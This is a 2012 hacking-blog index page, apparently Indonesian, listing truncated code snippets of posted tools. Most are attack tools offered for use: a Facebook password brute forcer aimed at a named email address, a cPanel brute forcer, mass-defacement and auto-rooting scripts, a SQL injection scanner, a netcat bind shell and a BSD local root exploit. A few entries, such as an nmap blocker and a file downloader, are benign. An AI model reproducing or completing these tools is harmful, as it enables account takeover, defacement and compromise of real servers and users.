Pages

10 November 2012

Simple how to earn money from affiliate

How to earn $0.05 for every day just share a link affiliate this is the way, just click on the link Cent Play INTRODUCTION Promotion Program which designed to help you play games when balance go zero, you can get $0.01 every minute to continue to play. PROMOTION RULES • Get $0.01 every minute, up to $0.05 every day. • You account will be make lower priority...
Baca Selengkapnya... Simple how to earn money from affiliate

09 November 2012

Android Secret Codes

Android is going to be very popular now these days.Android market provides wide range of applications for fulfill all your needs.As a Android user all you need to know about Android OS. So here i m sharing with you some secret code. This code helps you to access some hidden option which are generally not given as default.Plz use this code carefully because...
Baca Selengkapnya... Android Secret Codes

Underc0der

!init #config scanner= 3 #config weapon= 3 #config armor= 4 #config engine= 0 #config heatsinks= 2 #def wpc #def ang #def turn ;how much to turn #def rh ;relative heading #def ts ;target speed #def o ;pos/neg offset flag #def off ;firing offset out 11, ...
Baca Selengkapnya... Underc0der

[JAVA] SQL Tools Auto Injector

Full source C0de => V...
Baca Selengkapnya... [JAVA] SQL Tools Auto Injector

Priv8 2012 Bypass Shell

Full Source c0de => V...
Baca Selengkapnya... Priv8 2012 Bypass Shell

Block NMAP Scan on Your Server

This is a simple bash shell to block NMAP Scan to your server #!/bin/bash # To run this file, first give the permission +x and execute this program # --# chmod +x blocknmap.sh # --# ./blocknmap.sh echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1" echo "3 3" echo "3 ________ .__ ________ 3" echo "7 ...
Baca Selengkapnya... Block NMAP Scan on Your Server

08 November 2012

Mass defaces root user

!-- print_r(" #--------------------------------------------------\ # Tool name : Mass Sa v1.0 | # Programmer : al-swisre | | # Email : oy3@hotmail.com | #--------------------------------------------------/ \n"); if(!$argv[1]){ print_r(" -------------------------------------\ USAGE : php mass_sa.php [Your index] | Ex : php mass_sa.php index.htm | -------------------------------------/ "); die(); } $d00m...
Baca Selengkapnya... Mass defaces root user

SQL CMD 3.0

View Full Source Code => V...
Baca Selengkapnya... SQL CMD 3.0

BackDoor Finder

#!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; usage() unless $ARGV[2]; my @searchTerm; my @checkTerm; if(lc($ARGV[0]) eq "r57") { push(@searchTerm, "inurl:r57.php"); push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\""); push(@searchTerm, "intitle:r57shell"); push(@checkTerm, "r57"); push(@checkTerm, "safe_mode"); } elsif(lc($ARGV[0]) eq "c99")...
Baca Selengkapnya... BackDoor Finder

FaceBook BruteForce

!-- ################################ # Face Book Brute Forcer ################################ set_time_limit(500); $username ="mameliaz@yahoo.com"; // username to brute force $dictionary ="list.txt"; // need dictionary to password list function kontrol($kullaniciadi,$sifre){ $useragent = "Firefox/3.0.17"; $data = "email=$kullaniciadi&pass=$sifre&login=Login" ; $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');...
Baca Selengkapnya... FaceBook BruteForce

mediafire.pl [Mediafire Downloader]

#!/usr/bin/perl # mediafire folder download script # designed to download the contents of a folder on mediafire # it's actually kind of slow, but that's mediafire's fault # unsure if downloading portion has error or if that's the uploader's fault # but not all archives arrive intact # provides: # &list_contents(mediafire_folder_id) # &mfget(mediafire_download_id) # will prompt for captcha once every ~6 downloads unfortunately, delays...
Baca Selengkapnya... mediafire.pl [Mediafire Downloader]

RDP Scanner Protocol

# Install Dulu Encoding::BER # Cara nya ketikan di Terminal a/ Command Prompt perl -MCPAN -e shell # lalu masukan install Encoding::BER # CODE : use strict; use warnings; use IO::Socket::INET; use Getopt::Long; use Encoding::BER; my %rdp_neg_type; $rdp_neg_type{"01"} = "TYPE_RDP_NEG_REQ"; $rdp_neg_type{"02"} = "TYPE_RDP_NEG_RSP"; $rdp_neg_type{"03"} = "TYPE_RDP_NEG_FAILURE"; my %rdp_neg_rsp_flags; $rdp_neg_rsp_flags{"00"} = "NO_FLAGS_SET"; $rdp_neg_rsp_flags{"01"}...
Baca Selengkapnya... RDP Scanner Protocol

Search Bug SQL injection union

#!/usr/bin/perl #Make By NoNam3 #My Blog is D4wFl1N@blogspot.com use strict; use warnings; use LWP::UserAgent; my $ua=LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); my $cargv=@ARGV; if ($cargv!=1) { print "ARGV wrong please check\nTheme:\n"; exit; } (my $target)=@ARGV; my $i=1; my $url=$target.'+and+1=2+union+select+concat(0x426f6e6774726f70,'.$i.',0x426f6e6774726f70)'; my...
Baca Selengkapnya... Search Bug SQL injection union

Self-Killing Perl Shell Through Netcat

#!/usr/bin/perl -w # save in /bin/selfkill # calls itself with argument in order to complete process and open up $portnum # with prompt for $lifetime seconds $| = 1; $lifetime = 60; # in seconds my $prompt = '[me@selfkill]$ '; my $portnum = 35898; # can be anything within port range # create file that deletes itself on completion system('echo -e "#!/bin/bash\nexec /bin/selfkill run\nexec /bin/rm $0" > /tmp/selfkill; chmod +x /tmp/selfkill'); #...
Baca Selengkapnya... Self-Killing Perl Shell Through Netcat

Facebook.pl Ver 1.0

#!/usr/bin/perl -w # # Facebook.pl (1.0) # # Description: # Functions to use Facebook # without Graph API (nor # Facebook apps, access tokens, # etc). # # Changes history: # Not today. # # License: # Public Domain. # # sud0 # http://sud0.unitedhack.com # use strict; use IO::Socket; use Encode; # Cookies my $cookies; # fbwall my $fb_dtsg; my $xhpc_targetid; my $xhpc_composerid; my $c_user; # http my $EOL = "\015\012"; my $BLANK = $EOL x 2; sub...
Baca Selengkapnya... Facebook.pl Ver 1.0

Cpanel Password Brute Forcer

#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By 3lim # Perl Version ( low speed ) # Oerginal Advisory : use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool...
Baca Selengkapnya... Cpanel Password Brute Forcer

Viper Auto Rooting Ver.2.0

#!/usr/bin/perl # # ==>> Viper Auto Rooting <<== # # # --------------------------------------------------------------------------------------------------------------------------- # Script : Perl # By : Bl4ck.Viper # From : Azarbycan (Turkish Man)(fardin Allahverdinajhand) # Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com # Version : 2.0 # For Black Hat & Real Hackers #...
Baca Selengkapnya... Viper Auto Rooting Ver.2.0

Auto Rooting Script ver 1.0

#!/usr/bin/perl # # Auto Rooting Script ver 1.0 # BHG Security Center ~ #bhg # _____ __ __________ __ # / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_ # / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\ #/ | \ | /| | ( <_> ) | | ( <_> | <_> ) | #\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__| # \/ \/ #To start...
Baca Selengkapnya... Auto Rooting Script ver 1.0

Ftp mass deface

Ftp mass deface (indonesianpeople) ______ _ __ __ _____ __ | ____| | | \/ | | __ \ / _| | |__ | |_ _ __ | \ / | __ _ ___ ___ | | | | ___| |_ __ _ ___ ___ | __| | __| '_ \ | |\/| |/ _` / __/ __| | | | |/ _ \ _/ _` |/ __/ _ \ | | | |_| |_) | | | | | (_| \__ \__ \ | |__| | __/ || (_| | (_| __/ |_| \__| .__/ |_| |_|\__,_|___/___/ |_____/...
Baca Selengkapnya... Ftp mass deface

BSD/x86 Ver. 8.x - Local Root Exploit

/* * * * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 * 0 _ __ __ __ 1 * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \...
Baca Selengkapnya... BSD/x86 Ver. 8.x - Local Root Exploit

Simple fuzzer.py

#!/usr/bin/python import random def randomfunc(length, allthecrap): randomstuff = "" for number in range(1,length + 1): randomthing = random.choice(allthecrap) randomstuff += randomthing if number == length: crud = open("crud.txt", "w") crud.write(randomstuff) crud.close() def choices(): length = int(raw_input("Enter the length: ")) allthecrap = u"""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789~!@#$%^&*()_-<>/\:;,.`'"[]{}|""" ...
Baca Selengkapnya... Simple fuzzer.py

Maxsciprt for Doa5 research

clearlistener () fsource = "D:\\_DLCREPACK\\UNPACK\\KASUMI_DLC_006.TMC" fsource = ("D:\\DOA5JtagRip_Boobooman\\DOA5JtagRip_Boobooman\\"+\ "Dead_or_Alive_5\\chara_common\\_Dump\\_Dump\\AYANE_COS_005.TMC") fsource = GetOpenFileName \ caption:"Select TMC File" \ types: "Tecmo Memory Catelog(*.tmc)|*.TMC|All files (*.*)|*.*|" if (fsource!=undefined) then ( fpath=getFilenamePath fsource fname=getFilenameFile fsource fsize=getFileSize fsource lsource...
Baca Selengkapnya... Maxsciprt for Doa5 research